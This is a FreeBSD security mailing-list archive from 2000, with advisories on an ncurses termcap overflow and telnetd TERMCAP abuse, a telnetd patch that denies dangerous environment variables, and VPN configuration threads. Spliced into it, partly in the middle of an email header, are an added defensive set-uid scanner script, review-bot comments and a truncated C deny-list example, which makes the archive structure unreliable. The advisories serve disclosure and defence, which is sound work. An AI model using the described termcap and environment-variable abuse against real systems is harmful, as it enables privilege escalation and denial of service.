From owner-freebsd-security Mon Nov 13 19:57:21 2000
Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id DD82D37B479 for ; Mon, 13 Nov 2000 19:57:02 -0800 (PST)
Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id eAE3uuD16037 for ; Mon, 13 Nov 2000 22:56:56 -0500 (EST)
Date: Mon, 13 Nov 2000 22:56:55 -0500 (EST)
From: Trevor Johnson
To: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:68.ncurses
In-Reply-To: <20001113235453.B39D637B479@hub.freebsd.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

This advisory would be better with a little more information:

- it doesn't mention that systems with telnetd linked against a vulnerable version of ncurses are susceptible to a remote DoS that doesn't require the attacker to remain connected (described to me by Esa Etelavuori and confirmed on my 4.1.1-R and 5.0-S systems).

- it doesn't mention that the devel/ncurses port, until 2000-11-10, installed a reportedly vulnerable version of the library.

- it doesn't mention the report by venglin of problems with 3.x (http://www.securityfocus.com/advisories/2269).

On Mon, 13 Nov 2000, FreeBSD Security Advisories wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> =============================================================================
> FreeBSD-SA-00:68                                           Security Advisory
>                                                                 FreeBSD, Inc.
>
> Topic:          ncurses allows local privilege escalation
>
> Category:       core
> Module:         ncurses
> Announced:      2000-11-13
> Affects:        FreeBSD 5.0-CURRENT, 4.x prior to the correction date.
>                 FreeBSD 3.x vulnerability status currently unconfirmed.
> Corrected:      2000-10-11 (FreeBSD 4.1.1-STABLE)
> Credits:        Jouko Pynnonen
> FreeBSD only:   NO
>
> I.   Background
>
> ncurses is a text-mode display library used for formatting the output of applications on a variety of terminals. It is externally maintained, contributed code which is included in FreeBSD by default.
>
> II.  Problem Description
>
> There exists an overflowable buffer in the libncurses library in the processing of cursor movement capabilities. An attacker can force a privileged application to use the attacker's termcap file containing a specially crafted terminal entry, which will trigger the vulnerability when the vulnerable ncurses code is called. This allows them to execute arbitrary code on the local system with the privileges of the exploited binary.
>
> The systat utility included in the FreeBSD base system is known to use vulnerable ncurses routines. It runs with increased privileges as a member of the kmem group, which allows it to read from kernel memory (but not write to it). A process with the ability to read from kernel memory can monitor privileged data such as network traffic, disk buffers and terminal activity, and may be able to leverage this to obtain further privileges on the local system or on other systems, including root privileges.
>
> There may be other vulnerable applications included in the FreeBSD 4.x base system, but no others are confirmed to be vulnerable due to the difficulty in identifying a complete list of vulnerable ncurses functions. However the following is a complete list of FreeBSD system binaries which link against ncurses and run with increased privileges. They may or may not be vulnerable to exploitation.
>
> /usr/sbin/lpc
> /usr/bin/top
> /usr/bin/systat
>
> FreeBSD 3.x and earlier versions use a very old, customized version of ncurses which is difficult to update without breaking backwards-compatibility. The update was made for FreeBSD 4.0, but 3.x will not be updated to the newer version. At this stage the vulnerability has not been confirmed in FreeBSD 3.x.
>
> III. Impact
>
> Certain setuid/setgid software (including FreeBSD base system utilities and third party ports/packages) may be vulnerable to a local exploit yielding privileged access.
>
> The /usr/bin/systat utility is known to be vulnerable to this problem in ncurses. At this time it is unknown whether /usr/bin/top and /usr/sbin/lpc are also affected.
>
> The problems were corrected prior to the release of FreeBSD 4.2.
>
> IV.  Workaround
>
> It is not feasible to reliably detect binaries which are vulnerable to the ncurses vulnerability; however, the provided utility will scan for privileged binaries which use ncurses and which may potentially be vulnerable. Some of the binaries reported may not in fact be vulnerable, but should be recompiled anyway for maximum assurance of security.
>
> Statically linked binaries which are identified as potentially vulnerable should be recompiled from source code if possible, after patching and recompiling libncurses, in order to correct the vulnerability. Dynamically linked binaries will be corrected by simply patching and recompiling libncurses as described below.
>
> As an interim measure, consider removing any identified setuid or setgid binary, removing set[ug]id privileges from the file, or limiting the file access permissions, as appropriate.
>
> Of course, it is possible that some of the identified files may be required for the correct operation of your local system, in which case there is no clear workaround except for limiting the set of users who may run the binaries, by an appropriate use of user groups and removing the "o+x" file permission bit.
>
> 1) Download the 'scan_ncurses.sh' and 'test_ncurses.sh' scripts from
>
> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/scan_ncurses.sh
> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/test_ncurses.sh
>
> e.g. with the fetch(1) command:
>
> # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/scan_ncurses.sh
> Receiving scan_ncurses.sh (381 bytes): 100%
> 381 bytes transferred in 0.1 seconds (7.03 kBps)
> # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/test_ncurses.sh
> Receiving test_ncurses.sh (604 bytes): 100%
> 604 bytes transferred in 0.1 seconds (6.55 kBps)
>
> 2) Verify the md5 checksums and compare to the value below:
>
> # md5 scan_ncurses.sh
> MD5 (scan_ncurses.sh) = 597f63af701253f053581aa1821cbac1
> # md5 test_ncurses.sh
> MD5 (test_ncurses.sh) = 12491ceb15415df7682e3797de53223e
>
> 3) Run the scan_ncurses.sh script against your system:
>
> # chmod a+x ./test_ncurses.sh
> # sh scan_ncurses.sh ./test_ncurses.sh /
>
> This will scan your entire system for setuid or setgid binaries which make use of the ncurses library. Each returned binary should be examined (e.g. with 'ls -l' and/or other tools) to determine what security risk it poses to your local environment, e.g. whether it can be run by arbitrary local users who may be able to exploit it to gain privileges.
>
> 4) Remove the binaries, or reduce their file permissions, as appropriate.
>
> V.   Solution
>
> Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE after the correction date, or patch your present system source code and rebuild. Then run the scan_ncurses.sh script as instructed in section IV and identify any statically-linked binaries as reported by the script. These should either be removed, recompiled, or have privileges restricted to secure them against this vulnerability (since statically-linked binaries will not be affected by simply recompiling the shared libncurses library).
>
> To patch your present system: download the updated ncurses code from the below location, and execute the following commands as root:
>
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:68/ncurses.tar.gz
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:68/ncurses.tar.gz.asc
>
> Verify the detached PGP signature using your PGP utility.
>
> cd /usr/src
> tar xvfz /path/to/ncurses.tar.gz
> cd /usr/src/lib/libncurses
> make all
> make install
>
> In contrast to the usual practise, a simple patch fixing the security vulnerability is not provided because the vendor did not make one available, and the updated ncurses snapshot which fixed the vulnerability contains numerous other changes whose purpose and relation to the fix was unclear.

--
Trevor Johnson
http://jpj.net/~trevor/gpgkey.txt

From owner-freebsd-security Mon Nov 13 22:10:16 2000
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 8286537B479 for ; Mon, 13 Nov 2000 22:10:14 -0800 (PST)
Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAE6BUY15719; Mon, 13 Nov 2000 22:11:30 -0800 (PST) (envelope-from kris)
Date: Mon, 13 Nov 2000 22:11:30 -0800
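Section IV of the advisory quoted above describes the defensive inventory step: find every set-user-ID or set-group-ID file and report the ones that use ncurses, treating statically linked ones separately because relinking libncurses does not fix them. The script below is an added example of that inventory, not the advisory's own scan_ncurses.sh or test_ncurses.sh (which are not reproduced here). It classifies a file as using ncurses if ldd lists libncurses (dynamic link) or if the library name or an ncurses-internal symbol name is embedded in the file; the choice of "tgoto" and "_nc_" as static-link hints is an assumption of this example, and the demo() data is constructed.

```shell
#!/bin/sh
# Added example (not the advisory's scan_ncurses.sh/test_ncurses.sh):
# inventory set-user-ID / set-group-ID files under a directory tree and
# report those that reference libncurses, whether linked dynamically
# (library name appears in ldd output) or statically (library name or an
# ncurses-internal symbol is embedded in the binary).

# uses_ncurses FILE: exit status 0 if FILE references ncurses, 1 if not.
uses_ncurses() {
    f=$1
    # Dynamically linked: ldd lists the shared library.
    if ldd "$f" 2>/dev/null | grep -q 'libncurses'; then
        return 0
    fi
    # Statically linked, or ldd not applicable: search the bytes directly.
    # -a treats the file as text so grep does not stop at the first NUL.
    # The symbol hints "tgoto" and "_nc_" are an assumption of this example.
    if grep -aq -e 'libncurses' -e 'tgoto' -e '_nc_' "$f" 2>/dev/null; then
        return 0
    fi
    return 1
}

# scan_tree DIR: print an "ls -l" line for every set[ug]id regular file
# under DIR (staying on one file system) that uses ncurses.
scan_tree() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        if uses_ncurses "$f"; then
            ls -l "$f"
        fi
    done
    return 0
}

# count_hits DIR: number of files scan_tree reports for DIR.
count_hits() {
    scan_tree "$1" | wc -l | tr -d ' '
}

# demo: run the scanner over a constructed tree of three set[ug]id files
# (sample data, not real binaries) and print the hit count.
# The file with no ncurses reference must not be reported, so the
# expected count is 2.
demo() {
    tmp=$(mktemp -d)
    printf 'no curses here\n'      > "$tmp/plain"
    printf 'links libncurses.so\n' > "$tmp/static_like"
    printf 'tgoto and _nc_tparm\n' > "$tmp/symbols_only"
    chmod 4755 "$tmp/plain" "$tmp/static_like"   # set-user-ID
    chmod 2755 "$tmp/symbols_only"               # set-group-ID
    count_hits "$tmp"
    rm -rf "$tmp"
}

# Real use, as root, over the whole system:
#   scan_tree /
```

Every file reported should then be checked the way the advisory says: is it really needed, who can execute it, and is it statically linked (in which case recompiling it, not just libncurses, is required).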
From: Kris Kennaway
To: Trevor Johnson
Cc: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:68.ncurses
Message-ID: <20001113221129.A15599@citusc17.usc.edu>
References: <20001113235453.B39D637B479@hub.freebsd.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TB36FDmn/VVEgNH/"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from trevor@jpj.net on Mon, Nov 13, 2000 at 10:56:55PM -0500

On Mon, Nov 13, 2000 at 10:56:55PM -0500, Trevor Johnson wrote:
> This advisory would be better with a little more information:
>
> - it doesn't mention that systems with telnetd linked against a vulnerable
> version of ncurses are susceptible to a remote DoS that doesn't require
> the attacker to remain connected (described to me by Esa Etelavuori
> and confirmed on my 4.1.1-R and 5.0-S systems).

This is a separate advisory under preparation, since it's really a separate problem.

> - it doesn't mention that the devel/ncurses port, until 2000-11-10,
> installed a reportedly vulnerable version of the library.

Oops, that was an oversight.

> - it doesn't mention the report by venglin of
> problems with 3.x (http://www.securityfocus.com/advisories/2269).

I haven't been able to confirm it (and fixing it in 3.x is going to be something of a pain) - I haven't got any 3.x machines to test on. Actually I had something in a previous revision of the advisory which contained stronger language but I toned it down and unintentionally made it sound like we didn't know the problem had been reported. I'll probably update this tomorrow..thanks for the feedback.

Kris

From owner-freebsd-security Mon Nov 13 22:14:30 2000
Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id 4D8B837B479 for ; Mon, 13 Nov 2000 22:14:27 -0800 (PST)
Received: (qmail 31550 invoked from network); 14 Nov 2000 06:14:24 -0000
Received: from swun.esec.com.au (HELO eSec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 14 Nov 2000 06:14:24 -0000
Message-ID: <3A10DB41.926EA1A@eSec.com.au>
Date: Tue, 14 Nov 2000 17:27:13 +1100
From: Sam Wun
Organization: eSec
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
Cc: security@FreeBSD.ORG
Subject: Re: racoon -> isakmpd
References: <657B20E93E93D4118F9700D0B73CE3EA02427F@goofy.epylon.lan>
Content-Type: text/plain; charset=gb2312
Content-Transfer-Encoding: 7bit

Can we use isakmpd in FreeBSD instead? If we can use isakmpd in FreeBSD, both ends will be talking the same protocol.

Sam.

Jason DiCioccio wrote:
> I would be interested in this too if anyone knows
>
> -------
> Jason DiCioccio
> Unix BOFH
>
> mailto:jasond@epylon.com
>
> 415-593-2761 Direct & Fax
> 415-593-2900 Main
>
> Epylon Corporation
> 645 Harrison Street, Suite 200
> San Francisco, CA 94107
> www.epylon.com
>
> OK, so you're a Ph.D. Just don't touch anything.
>
> -----Original Message-----
> From: Sam Wun [mailto:swun@eSec.com.au]
> Sent: Monday, November 13, 2000 6:36 PM
> Cc: security@FreeBSD.ORG
> Subject: racoon -> isakmpd
>
> Hi!
>
> Does anyone got a FreeBSD box with racoon working together with a
> OpenBSD box with isakmpd as a VPN?
>
> Our headoffice uses OpenBSD on their firewall and uses isakmpd for VPN,
> I want to use FreeBSD with racoon but with no sucess.
>
> Any working configs out there?
>
> Thanks
> Sam.

From owner-freebsd-security Tue Nov 14 06:13:42 2000
Received: from rerun.lucentctc.com (rerun.lucentctc.com [199.93.237.2]) by hub.freebsd.org (Postfix) with ESMTP id 339D537B4C5 for ; Tue, 14 Nov 2000 06:13:39 -0800 (PST)
Received: by rerun.lucentctc.com with Internet Mail Service (5.5.2650.21) id ; Tue, 14 Nov 2000 09:13:37 -0500
Message-ID: <443F9E4C6D67D4118C9800A0C9DD99D710815D@rerun.lucentctc.com>
From: "Cambria, Mike"
To: 'Jason DiCioccio', 'Sam Wun'
Cc: security@FreeBSD.ORG
Subject: RE: racoon -> isakmpd
Date: Tue, 14 Nov 2000 09:13:35 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain; charset="iso-8859-1"

This isn't an answer to your specific question, but I've been able to get racoon on FreeBSD 4.2-Beta working with a few other IPSec products I've been evaluating.

The racoon log file can point you to the right area of the config file which needs to change. The log file of the other end can't hurt either.

Make sure that you are using the latest racoon port (racoon-20001017b). The syntax has changed and the man page for racoon.conf was updated (but the date of the man page is the same). All the core dumps I had also went away.

A few things I remember:

I use anonymous for both remote and sainfo. I haven't tried being specific yet.

In your remote directive, make sure your dh_group matches that of your partner. The log file will tell you what the other end is using and if these match.

In your sainfo, comment out the pfs_group (or make sure it matches; again from the log file).

Also, I had trouble with the sainfo lifetime byte and lifetime time values. The log complained that the other end sent values which were not even close to what racoon was using. Make them match.

Good luck,
MikeC

Michael C. Cambria
Avaya Inc.
Former Enterprise Networks Group of Lucent Technologies
Voice: (978) 287 - 2807
Fax: (978) 287 - 2810
300 Baker Avenue
Concord, Massachusetts 01742
Internet: mcambria@avaya.com

-----Original Message-----
From: Jason DiCioccio [mailto:Jason.DiCioccio@Epylon.com]
Sent: Monday, November 13, 2000 9:24 PM
To: 'Sam Wun'
Cc: security@FreeBSD.ORG
Subject: RE: racoon -> isakmpd

I would be interested in this too if anyone knows

-------
Jason DiCioccio
Unix BOFH

mailto:jasond@epylon.com

415-593-2761 Direct & Fax
415-593-2900 Main

Epylon Corporation
645 Harrison Street, Suite 200
San Francisco, CA 94107
www.epylon.com

OK, so you're a Ph.D. Just don't touch anything.

-----Original Message-----
From: Sam Wun [mailto:swun@eSec.com.au]
Sent: Monday, November 13, 2000 6:36 PM
Cc: security@FreeBSD.ORG
Subject: racoon -> isakmpd

Hi!

Does anyone got a FreeBSD box with racoon working together with a OpenBSD box with isakmpd as a VPN?

Our headoffice uses OpenBSD on their firewall and uses isakmpd for VPN, I want to use FreeBSD with racoon but with no sucess.

Any working configs out there?

Thanks
Sam.

<< File: Jason DiCioccio.vcf >>

From owner-freebsd-security Tue Nov 14 10:34:28 2000
Received: from grimreaper.grondar.za (grimreaper.grondar.za [196.7.18.138]) by hub.freebsd.org (Postfix) with ESMTP id 8ECED37B479 for ; Tue, 14 Nov 2000 10:34:22 -0800 (PST)
Received: from grondar.za (localhost [127.0.0.1]) by grimreaper.grondar.za (8.11.1/8.11.1) with ESMTP id eAE9J6132355; Tue, 14 Nov 2000 11:19:11 +0200 (SAST) (envelope-from mark@grondar.za)
Message-Id: <200011140919.eAE9J6132355@grimreaper.grondar.za>
To: "Nuno Teixeira"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: PPP NAT Gateway security
References: <00c801c04dc4$12a89220$0200a8c0@n2>
In-Reply-To: <00c801c04dc4$12a89220$0200a8c0@n2>; from "Nuno Teixeira" "Mon, 13 Nov 2000 22:50:05 GMT."
Date: Tue, 14 Nov 2000 11:19:06 +0200
From: Mark Murray

> My question is: do I need to configure this machine with firewall, so I can
> protect my internal network from the outside net?

Only you can answer this question. Only you know what is on your computer, only you know how your computer is configured, only you know how your computer is to be used, only you know what your capabilities are, and only you know what data there is on your hard disk that an attacker may want or may destroy.

Your call :-).

M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Tue Nov 14 11:23:03 2000
Received: from bessel.tekniikka.turkuamk.fi (bessel.tekniikka.turkuamk.fi [193.166.133.10]) by hub.freebsd.org (Postfix) with ESMTP id 8B4AF37B4D7 for ; Tue, 14 Nov 2000 11:22:59 -0800 (PST)
Received: from localhost (eyurtese@localhost) by bessel.tekniikka.turkuamk.fi (8.9.2/8.9.2) with ESMTP id VAA62394 for ; Tue, 14 Nov 2000 21:22:56 +0200
Date: Tue, 14 Nov 2000 21:22:56 +0200 (WET)
From: Evren Yurtesen
To: freebsd-security@freebsd.org
Subject: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Aren't there any plans to put the latest version of bind into the source tree? The ISC web page says that there are 8 bugs in patchlevel 6.

Evren

From owner-freebsd-security Tue Nov 14 13:11:23 2000
Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 6B63037B479; Tue, 14 Nov 2000 13:11:10 -0800 (PST)
Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.0/8.11.0) with ESMTP id eAELAUM58899; Tue, 14 Nov 2000 16:10:30 -0500 (EST)
Message-Id: <5.0.1.4.0.20001114153658.00a58df0@marble.sentex.ca>
X-Sender: mdtpop@marble.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Version 5.0.1
Date: Tue, 14 Nov 2000 16:04:04 -0500
To: Mike
From: Mike Tancsa Subject: Re: VPN over PPPoE (racoon at fault? - no pilot error) Cc: freebsd-net@freebsd.org, security@freebsd.org In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org OK, thanks very much to Mike Cambria, (mcambria@avaya.com) for suggesting adjusting the lifetime settings. I am cc'ing to security@freebsd.org in case others run into this problem of using racoon over slower than ethernet links. Setup is a FreeBSD box running PPPoE over DSL across a few hops to another FreeBSD machine on the ethernet. The trick is to bump up the lifetime value in racoon.conf and to make sure you have a recent version of racoon. I used the one from November 11th. Here is a quick sample config for two machines PPPoE machine's _public_ address on tun0 : 169.1.134.1 PPPoE machine's _private_ address aliased on lo0 : 10.1.2.1 Office Server's _public_ address on fxp0 172.168.93.4 Office Server's _private_ address aliased on lo0 : 10.1.1.1 *Note, if your machine has 2 interfaces, you can of course use the RFC1918 space on it instead. This example assumes you just have the one NIC to play with. #!/bin/sh #PPPoE config ifconfig lo0 10.1.2.1 netmask 255.255.255.0 alias gifconfig gif0 169.1.134.1 172.168.93.4 ifconfig gif0 inet 10.1.2.1 10.1.1.1 netmask 255.255.255.0 setkey -FP setkey -F setkey -c < > On 9 Nov 2000 17:01:58 -0500, in sentex.lists.freebsd.net you wrote: > > > > >Hi all, > > > > > >Has anyone ever successfully configured VPN (using IPSec protocol) over > > >PPPoE connection? I have 1 VPN configured over 2 locations with T1 > > >connections without any problem (using the KAME IPSec on FreeBSD > > >4.1.1). However, when I tried the same configuration with the 3rd > > >location running DSL, it seems the IPSec packets can't reach out via tun0 > > >device. > > > > I can do it with manual keying, but not with racoon. 
> > Both transport and
> > tunnel mode work for me, but neither works with racoon. NAT is a bit
> > tricky, but then again with tunnel mode, it doesn't really matter.
> >
> > One end is
> > 4.2-BETA FreeBSD 4.2-BETA #0: Mon Nov 13 13:52:46 EST 2000
> > other is
> > 4.2-BETA FreeBSD 4.2-BETA #0: Sun Nov 5 18:25:14 EST 2000
> >
> > This is via the same sort of DSL you are using, i.e. Bell Nexxia type stuff
> > through a Redback etc...
> >
> > I haven't had time to send a note to the KAME folk, but when using racoon on
> > DSL, I get these sorts of log entries that I don't normally get
> >
> > 2000-11-13 23:46:29: isakmp_agg.c:927:agg_r2recv():
> > real.addr.totally-diff-subnet.1 ignore the packet, received unexpecting
> > payload type 1.
> > 2000-11-13 23:46:10: isakmp_inf.c:177:isakmp_info_recv():
> > real.addr.totally-diff-subnet.1 ignore the packet, received unexpecting
> > payload type 89.
> > 2000-11-13 23:52:37: isakmp_inf.c:177:isakmp_info_recv():
> > real.addr.totally-diff-subnet.4 ignore the packet, received unexpecting
> > payload type 187.
> >
> > ---Mike
> > Mike Tancsa (mdtancsa@sentex.net)
> > Sentex Communications Corp,
> > Waterloo, Ontario, Canada
> > "Given enough time, 100 monkeys on 100 routers
> > could setup a national IP network." (KDW2)

From owner-freebsd-security Tue Nov 14 14:16:39 2000
Date: Tue, 14 Nov 2000 14:17:48 -0800
From: Kris Kennaway
To: Evren Yurtesen
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000)
Message-ID: <20001114141747.A30689@citusc17.usc.edu>

On Tue, Nov 14, 2000 at 09:22:56PM +0200, Evren Yurtesen wrote:
> Isn't there any plans of putting the latest version of bind to the source
> tree? At the ISC web page it is told that there are 8 bugs about the
> patchlevel 6

The upgrade will be committed shortly, I believe - it only applies to 3.x, since 4.x has 8.2.3.

Kris

From owner-freebsd-security Tue Nov 14 14:31:36 2000
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:69.telnetd
Reply-To: security-advisories@freebsd.org
Message-Id: <20001114223059.4FA8837B479@hub.freebsd.org>
Date: Tue, 14 Nov 2000 14:30:59 -0800 (PST)

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:69                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          telnetd allows remote system resource consumption.

Category:       core
Module:         telnetd
Announced:      2000-11-14
Credits:        Jouko Pynnonen
Affects:        FreeBSD 3.x (all releases),
                FreeBSD 4.x (all releases prior to 4.2),
                FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the
                correction date.
Corrected:      2000-10-30 (FreeBSD 4.1.1-STABLE)
                2000-11-01 (FreeBSD 3.5.1-STABLE)
FreeBSD only:   NO

I.   Background

telnetd is the server for the telnet remote login protocol.

II.  Problem Description

The telnet protocol allows for UNIX environment variables to be passed
from the client to the user login session on the server. However, some
of these environment variables have special meaning to the telnetd
child process itself and may be used to affect its operation.

Of particular relevance is the ability for remote users to cause an
arbitrary file on the system to be searched for termcap data by passing
the TERMCAP environment variable. Although any file on the local system
can be read since the telnetd server runs as root, the contents of the
file will not be reported in any way to the remote user unless it
contains a valid termcap entry, in which case the corresponding termcap
sequences will be used to format the output sent to the client. It is
believed there is no risk of data disclosure through this vulnerability.
However, an attacker who forces the server to search through a large
file or to read from a device can cause resources to be spent by the
server, including CPU cycles and disk read bandwidth, which can increase
the server load and may prevent it from servicing legitimate user
requests.

Since the vulnerability occurs before the login(1) utility is spawned,
it does not require authentication to a valid account on the server in
order to exploit.

All released versions of FreeBSD prior to the correction date including
4.0, 4.1, 4.1.1 and 3.5.1 are vulnerable to this problem, but it was
fixed in the 4.1.1-STABLE branch prior to the release of FreeBSD
4.2-RELEASE.

III. Impact

Remote users without a valid login account on the server can cause
resources such as CPU and disk read bandwidth to be consumed, causing
increased server load and possibly denying service to legitimate users.

IV.  Workaround

1) Disable the telnet service, which is usually run out of inetd:
comment out the following lines in /etc/inetd.conf, if present.

telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
telnet  stream  tcp6    nowait  root    /usr/libexec/telnetd    telnetd

2) Impose access restrictions using TCP wrappers (/etc/hosts.allow), or
a network-level packet filter such as ipfw(8) or ipf(8) on the perimeter
firewall or the local machine, to limit access to the telnet service to
trusted machines.

V.   Solution

One of the following:

1) Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE or
3.5.1-STABLE after the respective correction dates.

2) Apply the patch below and recompile the relevant files:

Either save this advisory to a file, or download the patch and detached
PGP signature from the following locations, and verify the signature
using your PGP utility.
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:69/telnetd.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:69/telnetd.patch.asc Execute the following commands as root: # cd /usr/src/libexec/telnetd # patch -p < /path/to/patch_or_advisory # make depend && make all install Patch for vulnerable systems: Index: sys_term.c =================================================================== RCS file: /mnt/ncvs/src/libexec/telnetd/sys_term.c,v retrieving revision 1.24 retrieving revision 1.25 diff -u -r1.24 -r1.25 --- sys_term.c 1999/08/28 00:10:24 1.24 +++ sys_term.c 2000/10/31 05:29:54 1.25 @@ -1799,6 +1799,13 @@ strncmp(*cpp, "_RLD_", 5) && strncmp(*cpp, "LIBPATH=", 8) && #endif + strncmp(*cpp, "LOCALDOMAIN=", 12) && + strncmp(*cpp, "RES_OPTIONS=", 12) && + strncmp(*cpp, "TERMINFO=", 9) && + strncmp(*cpp, "TERMINFO_DIRS=", 14) && + strncmp(*cpp, "TERMPATH=", 9) && + strncmp(*cpp, "TERMCAP=/", 9) && + strncmp(*cpp, "ENV=", 4) && strncmp(*cpp, "IFS=", 4)) *cpp2++ = *cpp; } Index: telnetd.c =================================================================== RCS file: /mnt/ncvs/src/libexec/telnetd/telnetd.c,v retrieving revision 1.22 retrieving revision 1.23 diff -u -r1.22 -r1.23 --- telnetd.c 2000/01/25 14:52:00 1.22 +++ telnetd.c 2000/10/31 05:29:54 1.23 @@ -811,7 +811,7 @@ fatal(net, "Out of ptys"); if ((pty = open(lp, 2)) >= 0) { - strcpy(line,lp); + strlcpy(line,lp,sizeof(line)); line[5] = 't'; break; } @@ -1115,7 +1115,7 @@ IM = Getstr("im", &cp); IF = Getstr("if", &cp); if (HN && *HN) - (void) strcpy(host_name, HN); + (void) strlcpy(host_name, HN, sizeof(host_name)); if (IF && (if_fd = open(IF, O_RDONLY, 000)) != -1) IM = 0; if (IM == 0) Index: utility.c =================================================================== RCS file: /mnt/ncvs/src/libexec/telnetd/utility.c,v retrieving revision 1.13 retrieving revision 1.14 diff -u -r1.13 -r1.14 --- utility.c 1999/08/28 00:10:25 1.13 +++ utility.c 2000/10/31 05:29:54 1.14 
@@ -330,7 +330,7 @@ { char buf[BUFSIZ]; - (void) sprintf(buf, "telnetd: %s.\r\n", msg); + (void) snprintf(buf, sizeof(buf), "telnetd: %s.\r\n", msg); (void) write(f, buf, (int)strlen(buf)); sleep(1); /*XXX*/ exit(1); @@ -343,7 +343,7 @@ { char buf[BUFSIZ], *strerror(); - (void) sprintf(buf, "%s: %s", msg, strerror(errno)); + (void) snprintf(buf, sizeof(buf), "%s: %s", msg, strerror(errno)); fatal(f, buf); } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOhG9KFUuHi5z0oilAQHUZwP/Xmo3EDteE4HwZovAO6UFzNtc3xVsFaUr Thf5XvpPThIOKmyYsUOL/kRbfnU3vJUdPA21uDYKyUEil5+x8+ZAuDzJXfMxHwu8 MMD1/d5QFfvuWN5W+/msdT7XKEjTmm4f09/tMxRAEyIMeKRj2H4gWxEGmaivJtvT 6bFKtbsSW1Q= =UltL -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 14:32:30 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 72E6B37B4D7; Tue, 14 Nov 2000 14:32:03 -0800 (PST) 
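Review bot: In the sys_term.c hunk each new prefix carries its length as a separate literal (12, 9, 14, 4) that has to be kept in step with the string by hand; a table of `{ "TERMPATH=", sizeof("TERMPATH=") - 1 }` entries walked in one loop would tie every length to its string and make the next addition a one-line change. The `"TERMCAP=/"` entry deliberately rejects only file-path values, so an inline termcap entry still passes; a short comment on that line would stop the next reader from taking the 9 for an off-by-one.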
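Review bot: In the telnetd.c @@ -811 hunk the return value of `strlcpy(line,lp,sizeof(line))` is ignored and `line[5] = 't'` is then applied unconditionally, so a pty name that did not fit would be silently truncated and turned into a wrong device path rather than reported; strlcpy(3) returns the length it wanted for exactly this, e.g. `if (strlcpy(line, lp, sizeof(line)) >= sizeof(line)) fatal(net, "pty name too long");`.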
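Review bot: In the utility.c @@ -330 hunk the move to snprintf is right, but the following `write(f, buf, (int)strlen(buf))` still narrows a size_t to int for no reason; write(2) takes a size_t, so the cast can be dropped while this function is being touched.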
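Review bot: The utility.c @@ -343 hunk keeps the old-style local declaration in `char buf[BUFSIZ], *strerror();`; since the function is being changed anyway, remove that declaration and include <string.h> (and <errno.h> for errno) so the strerror() call is checked against a real prototype instead of an implicit one.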
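The environment filter that the sys_term.c hunk above extends, as an added table-driven example (not FreeBSD's telnetd source); the LD_ prefix is assumed from the loader checks that precede the hunk, and the sample environment is constructed.

```c
/*
 * Added example, not FreeBSD's telnetd source: the client-environment filter
 * that the SA-00:69 patch extends in sys_term.c, written as a table walk.
 * Every "NAME=value" string received from the telnet client is kept only if
 * its prefix is not on the deny list, so the client cannot steer telnetd's
 * own termcap/terminfo lookups, resolver options or shell start-up.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Deny-listed prefixes; each length is derived from its literal, so the two
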